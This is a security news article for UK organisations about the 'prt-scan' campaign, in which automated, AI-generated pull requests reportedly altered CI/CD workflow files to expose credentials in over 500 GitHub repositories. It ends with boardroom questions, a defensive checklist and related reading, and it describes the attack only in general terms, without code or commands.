A sophisticated AI-driven supply chain attack has successfully compromised over 500 GitHub repositories worldwide, including numerous UK organisations, marking the first documented case of machine learning being weaponised to automate the entire lifecycle of a credential harvesting campaign. The 'prt-scan' operation represents a fundamental shift in threat actor capabilities, demonstrating how artificial intelligence can operate at speeds that exceed human review processes.
The prt-scan campaign used machine learning algorithms to automatically generate convincing pull requests that targeted CI/CD pipeline configurations, extracting sensitive credentials and API keys from automated build processes. This attack methodology represents the evolution of supply chain threats from manual reconnaissance to fully automated intelligence gathering that can scale across thousands of targets simultaneously.
Key Facts:
- Over 500 GitHub repositories compromised through AI-generated pull requests
- Machine learning algorithms crafted repository-specific social engineering content
- Attack targeted CI/CD pipeline credentials and API keys automatically
- Campaign operated faster than typical human code review processes
What Makes AI-Powered Supply Chain Attacks Different?
Traditional supply chain attacks required significant manual effort to research target organisations, craft convincing social engineering content, and maintain persistent access across multiple repositories. The prt-scan campaign eliminated these bottlenecks by employing machine learning to automatically analyse repository structures, generate contextually appropriate pull requests, and extract credentials from CI/CD configurations without human intervention.
According to reporting from Wiz, the attackers used six different GitHub accounts to systematically target repositories with automated pull requests that appeared legitimate to cursory review. The AI system analysed existing code patterns, contributor behaviour, and repository metadata to generate convincing modifications that would trigger credential exposure during automated testing processes.
The NCSC's recent guidance on AI security emphasises that organisations must now defend against both human attackers using AI tools and fully autonomous AI-driven attacks that can operate continuously without direct oversight. This represents a qualitative change in the threat landscape that traditional security controls were not designed to address.
How the Automated Credential Harvesting Worked
The prt-scan operation targeted the fundamental trust relationship between open-source contributors and repository maintainers. The AI system would submit pull requests containing subtle modifications to workflow files that would cause CI/CD systems to expose environment variables containing API keys, database credentials, and cloud service tokens during automated testing.
These modifications were crafted to appear as legitimate bug fixes or performance improvements, making them difficult to identify during standard code review processes. The AI system learned from successful compromises to refine its approach across subsequent targets, creating an attack methodology that improved its effectiveness over time.
This automated approach enabled the campaign to operate at unprecedented scale, potentially targeting hundreds of repositories daily while maintaining the contextual awareness needed to evade detection. The speed of automated attacks now exceeds the capacity of human reviewers to thoroughly examine every pull request, creating a fundamental asymmetry in defensive capabilities.
Why Traditional Code Review Failed to Stop This Attack
The prt-scan campaign succeeded because it exploited the gap between automated security scanning and human code review processes. Most organisations rely on static analysis tools to identify obvious security vulnerabilities, combined with human reviewers who focus on functional correctness rather than sophisticated social engineering attempts.
The AI-generated pull requests were specifically designed to pass automated security scans while containing subtle logic that would expose credentials during the build process. This represents a new category of attack that sits in the blind spot between technical security controls and human oversight processes.
UK organisations following the NCSC's Secure Development guidance typically focus on preventing direct code injection or dependency confusion attacks, but may lack specific processes for identifying AI-generated social engineering attempts that target CI/CD infrastructure rather than application code directly.
Boardroom Questions
- Does our organisation have specific processes for reviewing pull requests from unknown contributors that target CI/CD configuration files or workflow automation?
- Can our current security team distinguish between human-generated and AI-generated social engineering attempts in code repositories and collaboration platforms?
- What credentials and API keys are accessible to our automated build processes, and do we have monitoring in place to detect unauthorised access attempts during CI/CD execution?
Quick Diagnostic
- CI/CD Security Review: Do you regularly audit what credentials and environment variables are accessible to your automated build and deployment processes?
- Pull Request Policies: Do you have specific approval requirements for changes to workflow files, CI/CD configurations, or automated testing scripts from external contributors?
- AI Threat Awareness: Has your development team received training on identifying potential AI-generated social engineering attempts in code contributions and collaboration requests?
Related Reading
Popular Security Scanner Trivy Weaponised Against UK DevSecOps Teams in Supply Chain Attack — Attackers compromised Aqua Security's widely-used Trivy vulnerability scanner on March 19, injecting credential-stealing
Supply Chain Exit Planning Gap Leaves UK Businesses Exposed to Systematic Failure — New ONS data reveals 37% of UK businesses fear supply chain disruption within 12 months, yet most lack robust exit strat
Claude Code Leak Spawns Malware Campaign Targeting UK Developers — Threat actors are exploiting developer interest in Anthropic's leaked Claude Code source by distributing Vidar credentia
First Major Victim Emerges From AI Supply Chain Attack That Hit 500,000 Systems — AI hiring startup Mercor becomes first public victim of LiteLLM supply-chain attack affecting 500,000 systems globally.
Axios NPM Package Compromised in Precision Supply Chain Attack — Attackers inject RAT malware into widely-used JavaScript HTTP client library, exposing UK organisations through CI/CD pi
Strengthen your organisation's security posture

